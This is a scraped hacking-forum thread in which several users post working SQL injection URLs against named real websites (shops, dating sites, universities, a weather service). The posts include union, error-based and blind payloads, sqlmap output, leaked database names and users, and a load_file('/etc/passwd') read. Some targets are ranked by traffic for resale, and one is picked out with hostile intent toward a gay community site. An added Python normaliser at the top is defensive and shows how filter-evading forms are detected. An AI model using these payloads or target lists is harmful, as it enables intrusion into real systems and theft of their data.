http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29 ,10,11,12,13,14--+
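Added example, not part of the thread and not any product's rule set: a log-side normaliser showing why a literal keyword filter misses the `%0B`-split and `/*!50000...*/`-wrapped forms reported in the posts above, and how canonicalising the query string first makes the same rules match again. The rule names, the `naive_filter` stand-in and the sample strings are constructed assumptions; stripping control bytes assumes, as the `%0B` post implies, that the application drops them before the query is built.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ and /*!50000 ... */ comments, so the body
# must stay visible to the matcher; ordinary /* ... */ comments act as a space.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Control bytes other than tab/LF/CR; includes 0x0B (the %0B from the post).
CONTROL_BYTES = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")

# Hypothetical rule set covering the payload shapes quoted in this thread.
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:(?:all|distinct)\s+)?select\b"),
    "error-based": re.compile(
        r"\b(?:extractvalue|updatexml)\s*\(|\bfloor\s*\(\s*rand\s*\("),
    "time-based": re.compile(r"\bsleep\s*\("),
    "schema-or-file": re.compile(r"\binformation_schema\b|\bload_file\s*\("),
}

# Stand-in for a literal keyword filter: one URL decode, no canonicalisation.
NAIVE = re.compile(r"union\s+select|information_schema")


def normalise(raw: str) -> list[str]:
    """Return canonical forms of a query string for rule matching."""
    text = raw
    for _ in range(3):  # bounded loop also undoes nested URL-encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED_COMMENT.sub(r" \1 ", text)  # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)
    variants = []
    # A control byte may be dropped by the application (keyword re-joins) or
    # treated as whitespace by the database, so both readings are checked.
    for filler in ("", " "):
        cleaned = CONTROL_BYTES.sub(filler, text)
        variants.append(re.sub(r"\s+", " ", cleaned).lower().strip())
    return variants


def classify(raw: str) -> set[str]:
    """Names of all rules that match any canonical form of the input."""
    hits = set()
    for variant in normalise(raw):
        hits.update(name for name, rx in RULES.items() if rx.search(variant))
    return hits


def naive_filter(raw: str) -> bool:
    """True if the literal keyword filter would have flagged the input."""
    return bool(NAIVE.search(unquote_plus(raw).lower()))


# Constructed query strings modelled on the shapes posted in the thread.
SAMPLES = [
    ("plain union", "id=-1 union select 1,2,version()--"),
    ("versioned comments", "id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3"),
    ("comment + hex-encoded keyword",
     "id=-1/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3"),
    ("%0B inside keywords",
     "id=1 uni%0Bon sel%0Bect 1,2 from infor%0Bmation_schema.tables"),
    ("%0B as separator", "id=1%0Bunion%0Bselect%0B1"),
    ("error-based",
     "q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(version())))))='1"),
    ("time-based", "id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))x)"),
    ("benign", "q=student union selection committee&page=2"),
]


def report():
    """(label, naive verdict, sorted rule hits) for every sample."""
    return [(label, naive_filter(q), sorted(classify(q))) for label, q in SAMPLES]


if __name__ == "__main__":
    for label, naive, hits in report():
        print(f"{label:32} naive={naive!s:5} normalised={hits}")
```

Matching after normalisation only helps triage and alerting; the fix for every URL in this thread is a parameterised query on the server side.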
DezMond™
22.09.2015, 19:02
Code:
https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21+--+
It was a warm-up; I thought it would do for selling, but it's small stuff, I think... maybe it will be useful to someone, or to the traffic people.
Code:
ttp://torrent.tlt.ru/browse.php?cat=5
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Nginx
back-end DBMS: MySQL 5.0
available databases [2]:
information_schema
tracker
Code:
mega-torrent.ru/browse.php?cat=18
Warning: mysql_fetch_array() expects parameter 1 to be resource
Code:
http://www.guildvalhall.eu/inc-news.php?id=8429
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
information_schema
valhall
There's a lot of info.)
WallHack
11.10.2015, 09:19
Code:
http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+
WallHack
13.10.2015, 15:11
A foreign dating site
Code:
http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+cou nt(*),concat(version(),floor(rand(0)*2))x+from+inf ormation_schema.tables+group+by+x)a)
A site for anonymous dating and debauchery...
Code:
https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(sele ct+count(*),concat(version(),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)
ButilkaSoka
17.10.2015, 20:47
Output is in the title, or in the page source
Code:
http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23 --
5.5.42-cll
Twins sports equipment
Output is in the title, or in the page source
Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,version(),26,27,28,29 or ''='
twinsspe_twins@localhost
5.5.36-cll
twinsspe_twins
Shop
Code:
http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))
plummo@localhost
5.1.73
plummo_shop
Code:
http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30 --
staff_user@lnv-101
4.0.21-Max
staff
Code:
http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),d atabase())))*/,4,5,6,7,8,9,10,11,12,13 --
ghashamo_user@localhost
5.5.42-37.1
ghashamo_db
Shop
Code:
http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),datab ase())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 +--+and '1'='1
mcbooks_dbuser@localhost
5.5.42-37.1
mcbooks_mainsite
DezMond™
23.10.2015, 22:00
Code:
http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(), 11,12+from+information_schema.tables+--+
5.5.44-0+deb7u1-log
Code:
http://www.ugon.kz/index.php?option=com_ncatalogues&controller=ajax&task=multiselect&id=28%20UNION%20ALL%20SELECT%20NULL,version%28%29, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL--%20&JsHttpRequest=14458949481000-xml
5.5.44-cll-lve
Code:
http://bol24.ru/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
http://casino-e.org/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
(http://casino-e.org/'+union+select+1,2,3,4,5,6,7,8,9+--+)
Code:
http://frisbee-pay.ru/client/'or(ExtractValue(1,concat(0x3a,(select(user()))))) ='1
Code:
http://www.iqpartner.info/ru/?CATALOG=hosting_tariff%27or(ExtractValue(1,concat (0x3a,(select(user())))))=%271
Code:
http://platforma.ru/'or(ExtractValue(1,concat(0x3a,(select(user()))))) ='1
WallHack
07.11.2015, 09:48
Yandex TIC 210 - Google Page Rank 3/10
Yandex Catalog: Yes - DMOZ.org catalog: Yes
Code:
http://www.soate.ru/news/new.php?id=-54+union+select+version(),2,3,4,5+--+
Version: 5.5.44-1+wheezy1+mh1-log
Code:
http://www.allomebel.ru/shop/?dir=-9%20union%20select%201,2,3,4,5,version%28%29,7,8,9 %20--
5.5.30-log
Yandex Catalog, TIC 70
Code:
http://www.fortland.ru/index.html?action=catalog&id=-6%20union%20select%201,2,3,4,5,6,version%28%29,8,9 ,10,11
5.5.46-cll
Yandex Catalog, TIC 200
Code:
http://www.rinekekop.nl/get_item.php?id=33'/*!50000UNION*//*!50000SELECT*/1,2,version(),user(),5-- -
5.5.42-cll-lve
ijsvogel@localhost
WallHack
24.11.2015, 17:23
Yandex TIC 230 - Google Page Rank 3/10
Yandex Catalog: Yes - DMOZ.org catalog: No
Code:
http://basket.ugmk.com/ru/news/index.php?id15=-10394+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18+--+
Code:
http://inet.pushkino-telecom.ru/index.php?id=qiwi-pay%27or(ExtractValue(1,concat(0x3a,(select(user() )))))=%271
Traffic 50k
Pr 5
Code:
http://astroscope.ru/blog/rate.php?id=-2842'+or+1+group+by+concat(0x7c,(select+mid((ifnul l(cast(schema_name+as+char),0x20)),1,54)+from+info rmation_schema.schemata+limit+1,1),0x7c,floor(rand (0)*2))+having+min(0)%23
WallHack
13.12.2015, 12:00
Code:
http://wmfast.com/news.php?id=-10%27+union+select+1,2,3,4+--+
Traffic 85k
TIC 800
PR 5
Code:
http://novostimira.com/videonews.php?act=view&id=1' and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
Traffic 100k
TIC 1600
Pr 7
File_priv=Y
Code:
http://pogoda.by/climat-directory/index.php?year=1'+union+all+select+concat(0x7e,0x2 7,load_file('/etc/passwd'),0x27,0x7e),1,1,1--+
ServerName pogoda.by
/var/www/html
ServerName pda.pogoda.by
/var/www/html/pda
ServerName meteoinfo.by
/var/www/www.meteoinfo.by
ServerName 6.pogoda.by
/var/www/html/six
THE OTHER WORLD KINGDOM 18+
HTML:
http://www.owk.cz/philosophy-operation/whoweare/subject.php?id=-9%20union%20select%201,version(),database(),user() ,5,6,7,8,9,10--+f
TIC10
PR3
AR405,200
Visits 25K
5.1.73-1+deb6u1wk:OWK_shop@localhost
WallHack
01.03.2016, 16:28
RU SHOP
Code:
http://thedespair.ru/product/0'+UnIon+selECt+1,@@version,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
5.5.35-rel33.0-log
Code:
http://www.colinst.com/brief.php?id=51%20and%20(select%201%20from(select% 20count(*),concat(user(),floor(rand(0)*2))x%20from %20information_schema.tables%20group%20by%20x)a)
Duplicate entry 'root@localhost1' for key 1
Version 5.0.671
There is a WAF on union select
WallHack
06.03.2016, 13:46
TIC 60 PR 3
Code:
http://www.eastoftheweb.com/short-stories/index.php?p=web/author/GuydeMaupassant%27+union+select+@@version,2+--+
To help Milonov
gaycities.com 253k gays
Code:
h**p://www.gaycities.com/biz/account/biz_activate.php
POST:pwsubmit=Verify Email Address&c=0c425b5&code=94102&referrer=http://www.gaycities.com/biz/account/&un=1') RLIKE (SELECT (CASE WHEN (666=666) THEN 1 ELSE 0x28 END)) AND ('gayS'='gayS
MySQL 5.1.33
Spoiler: gaycities_prod
WallHack
10.03.2016, 13:05
Code:
https://www.billykfitness.com/fitness/index.php/pay?pid=1%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x %20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),% 20FLOOR(RAND(0)*2)))%20--
5.1.731 for key
WallHack
14.03.2016, 14:56
TIC 325 Pr 3
Code:
http://www.ph4.ru/h_CITIES.php?d=2154+UnIon+selECt+1,2,3,4,5,6,7,8,9 ,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60+--+
5.5.44-37.3-log
powerOfthemind
14.03.2016, 17:55
Code:
http://www.pangea-tour.ru/cities.php?id=-201+union+select+1,database(),3,@@version,5,6,7,8, 9--&Spid=45
5.5.44-1+wheezy1+mh1-log
u21941_8
u21941
u21941_2
u21941_astra
u21941_tsls
East Coast Trail | Scenic and Unique Hiking and Walking Trails in Newfoundland and Labrador, Canada – Welcome to the East Coast
Code:
http://eastcoasttrail.ca/trail/view.php?id=3%20/*!50000union*/%20distinct%20select%20version(),2,3,4,5,6,7,8,9--+f
5.5.45-cll-lve
TIC10
PR5
Code:
http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511 (GET)
Parameter: liga (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: liga=2511 AND 1436=1436
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: liga=2511 AND (SELECT * FROM (SELECT(SLEEP(5)))oChU)
---
back-end DBMS: MySQL 5.0.12
Toss in some fat ones.
WallHack
25.03.2016, 15:01
Code:
http://www.mondanionline.com/valutazione-officine_panerai_panerai_ref__6152/1-36.php?lingua=it%20OR%20(SELECT%20COUNT(*)%20FROM% 20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELEC T%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,% 2063),%20FLOOR(RAND(0)*2)))%20--
5.6.25-log
After the request, the code stays in the cookies.
Code:
http://www.onionring.co.uk/article.asp?NID=411%20OR%20(SELECT%20COUNT(*)%20FR OM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SE LECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%20 1,%2063),%20FLOOR(RAND(0)*2)))%20--
5.5.29-log
Code:
http://en.chinapanda.org.cn/topic.php?id=5%20OR%20(SELECT%20COUNT(*)%20FROM%20 (SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT% 203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%20 63),%20FLOOR(RAND(0)*2)))%20--
5.6.27
Code:
http://alicekwartler.com/product-info.php?id=-1750+UnIon+selECt+1,2,3,4,5,6,@@version,8,9,10,11, 12,13+--+
5.0.96-log
danil7493
01.04.2016, 20:04
Code:
http://www.uralopera.ru/showperson.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12
5.5.46-MariaDB-1~wheezy-log 3
TIC425
Code:
http://www.autoconsulting.ua/news.php?catid=-1 union all select version(),2,3,4,5,6,7,8 and '0'='0
autoconsulting@localhost
5.5.40-log
TIC325 YC(R4) PR4
Code:
http://wciom.ru/index.php?id=236&uid=-1 union all select 1,2,3,4,5,6,version()--
5.5.38
TIC4300 PR6
Code:
http://sipaero.ru/post.php?id=-1 union all select 1,user(),database(),version(),5,6,7,8,9
admin_sipaero@localhost admin_sipaero 5.1.73
danil7493
02.04.2016, 14:32
Code:
http://www.affordablesound.com/productlist.php?id=version()
Code:
http://www.calais-shopping.com/fiche.php?id=9999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,ve rsion(),21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
5.1.73-0ubuntu0.10.04.1-log in the source
Code:
http://www.hotrodwelding.nl/product.php?id=9999.9' union all select 1,2,3,version(),5,6,7,8,9 and '0'='0
5.5.22-log
Code:
http://www.annam.com.hk/menu-causeway-bay.php?id=-6748' UNION ALL SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- -
5.5.45-cll-lve
Code:
http://www.jiteli.info/altai?fio=%F6%FC%25%27+and+adress+LIKE+%27%25%27+u nion+select+version%28%29,version%28%29+limit+1+--+s&adress=&searchButton=+%CD%E0%E9%F2%E8+
5.5.47
danil7493
07.04.2016, 13:20
Code:
http://www.casco.com.ru/index.php?contentID=741
---
Parameter: contentID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentID=741' AND 2149=2149 AND 'bXwR'='bXwR
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: contentID=741' OR (SELECT * FROM (SELECT(SLEEP(5)))qEJY) AND 'XZHa'
='XZHa
---
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14
back-end DBMS: MySQL 5.0.12
.................................................. ..........................................
Code:
http://www.avongorge.org.uk/aboutus.php?ContentID=1'+and(select+1+from(select+ count(*),concat((select(select(select+concat(0x3d7 e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+i nformation_schema.tables+limit+0,1),floor(rand(0)* 2))x+from+information_schema.tables+group+by+x)a)+ and+'1'='1
5.0.87-b20
Code:
http://www.steelers.co.nz/steelers/index.php?contentid=9999.9+union+all+select+1,2,(s elect+1+from(select+count(*),concat((select(select (select+concat(0x3d7e3d,ifnull(version(),char(32)) ,0x3d7e3d)+))+from+information_schema.tables+limit +0,1),floor(rand(0)*2))x+from+information_schema.t ables+group+by+x)a),4,5,6,7,8,9,10
'=~=5.5.34-MariaDB-cll-lve=~=1'
Code:
http://www.lostroveroscriollos.com/video.php?contentID=-3859 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL ,NULL,NULL-- -
5.1.30
Code:
http://www.mkungl.com/2/d.php?contentID=(select+1+from(select+count(*),con cat((select(select(select+concat(0x3d7e3d,ifnull(v ersion(),char(32)),0x3d7e3d)+))+from+information_s chema.tables+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)
'=~=5.1.67-rel14.3=~=1'
Code:
http://waddleviolins.com/index.php?contentID=86' UNION ALL SELECT NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL-- -
5.1.73-cll
Code:
http://www.uisp.it/torino2/index.php?contentId=18+or+1=(select+1+from(select+ count(*),concat((select(select(select+concat(0x3d7 e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+i nformation_schema.tables+limit+0,1),floor(rand(0)* 2))x+from+information_schema.tables+group+by+x)a)+ and+1=1
PR5 AlexaRank 100,405
Code:
http://www.erpug.org/index.php?contentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14 and '0'='0
5.5.47-MariaDB-1~wheezy
danil7493
07.04.2016, 15:48
Code:
www.fba-labs.com/index.php?contentid=1' union all select database(),version(),3,4 and '0'='0
fbalabs_admin@localhost fbalabs_cms 5.5.48-cll
http://www.strengholt.nl/musicgroup/content.php?menuid=27 or 1=-1 union all select version(),database()--
5.5.38-0ubuntu0.14.04.1 Strbv_strnl
http://www.dswbrand.com/flash_detail.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19
5.1.73-log
http://iram-institute.org/EN/content-page.php?ContentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(), 18,19,20,version(),22,23,24,25,26,27,28,29,30 and '0'='0
5.0.45 webdb
http://www.areatattoo.com/flash_detail.php?id=-1' union all select 1,2,version(),4 and '0'='0
5.5.41
danil7493
10.04.2016, 18:35
Code:
http://www.bestrent.fi/en/book-now.php?id=9999.9 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21
5.1.65
http://www.infantaria-paintball.com.br/loja/sessoes.asp?id=26'+and(select+1+from(select+count( *),concat((select(select(select+concat(0x3d7e3d,if null(version(),char(32)),0x3d7e3d)+))+from+informa tion_schema.tables+limit+0,1),floor(rand(0)*2))x+f rom+information_schema.tables+group+by+x)a)+and+'1 '='1
5.0.45-community-nt
http://www.badboysafloat.com.au/product_details.php?id=9999.9 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16
10.0.20-MariaDB-cll-lve
http://www.attaapparels.com/shop.php?id=9999.9 union all select 1,2,3,version(),5,6,7,8,9,10,11,12
5.5.44-log
http://www.kabelindo.co.id/readnews.php?id=(select+1+from(select+count(*),con cat((select(select(select+concat(0x3d7e3d,ifnull(v ersion(),char(32)),0x3d7e3d)+))+from+information_s chema.tables+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)
10.1.13-MariaDB
WallHack
16.04.2016, 11:05
Code:
_ttp://taxiforsazh.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
5.1.71-cll-lve
danil7493
21.04.2016, 17:10
Code:
http://relax-nk.ru/rub.php?id=1 union all select @@version,2
5.5.47
http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6
5.5.48-cll 3
http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8
5.5.29-log
www.powermanager.co.kr/bbs/shop_.php?cno=2
---
Parameter: cno (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cno=2) AND 2160=2160 AND (1973=1973
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12
Database: powermgcok
http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5
5.1.73-cll
http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(), char(32)))+)
5.5.45-cll-lve
http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9
5.1.73
http://www.zeogames.net/game.php?id=6
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 7494=7494
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
danil7493
22.04.2016, 15:40
Code:
http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3
5.0.96-log
http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6
10.1.13-MariaDB
http://www.nbrri.gov.ng/sites/news.php?ID=2
---
Parameter: ID (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(54
24=5424,1))),0x716b707871))
Type: AND/OR time-based blind
Title: MySQL = 5.0.12 AND time-based blind (SELECT)
Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu
---
back-end DBMS: MySQL 5.0.12
http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat ((select(select(select+concat(0x3d7e3d,ifnull(vers ion(),char(32)),0x3d7e3d)+))+from+information_sche ma.tables+limit+0,1),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)
5.5.43-37.2-log
danil7493
24.04.2016, 14:10
Code:
http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27-- -
5.5.34-32.0-log
================================================== ================================================== =============
https://www.fairradio.com/catalog.php?mode=view&categoryid=214
---
Parameter: categoryid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [2]:
fairrad_radio
information_schema
================================================== ================================================== =============
http://www.dataapex.com/catalog.php?catCategory=1
---
Parameter: catCategory (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
================================================== ================================================== =============
http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(* ),concat((select(select(select+concat(0x3d7e3d,ifn ull(version(),char(32)),0x3d7e3d)+))+from+informat ion_schema.tables+limit+0,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)+and+'1' ='1
5.5.41-0+wheezy1
+ XSS
================================================== ================================================== =============
http://jewelfox.ru/catalog.php?catId=ard
---
Parameter: catId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
Database: jewelfo9_db73544m
[32 tables]
================================================== ================================================== =============
http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
================================================== ================================================== =============
http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
4.0.24_Debian-10sarge3-log
powerOfthemind
26.04.2016, 11:39
Code:
http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,ver sion(),54,55,56,57,database(),59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74--
rentaproject_szn
5.0.82-log 7
Code:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a 774b55506a74774f78446271567a7473597579504145484677 68,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:
dealdb
information_schema
test
Otherwise it's all small fry, nothing but small fry!
http://i.imgur.com/2RloLOJ.png
RWD (https://antichat.live/members/234579/), work it out by hand.
Code:
http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user ())))+--+
Current User: root@localhost
Code:
http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2870=2870
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.5
Current DB: lafinancepourtousquiz
Data Base Found: information_schema
Data Base Found: grand_quiz
Data Base Found: lafinancepourtous
Data Base Found: lafinancepourtousgame
Data Base Found: lafinancepourtousquiz
Data Base Found: mysql
Data Base Found: performance_schema
Data Base Found: phpmyadmin
Data Base Found: portail
Data Base Found: preprod
current user: 'atame_@localhost'
Code:
http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=9 AND 7978=7978
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
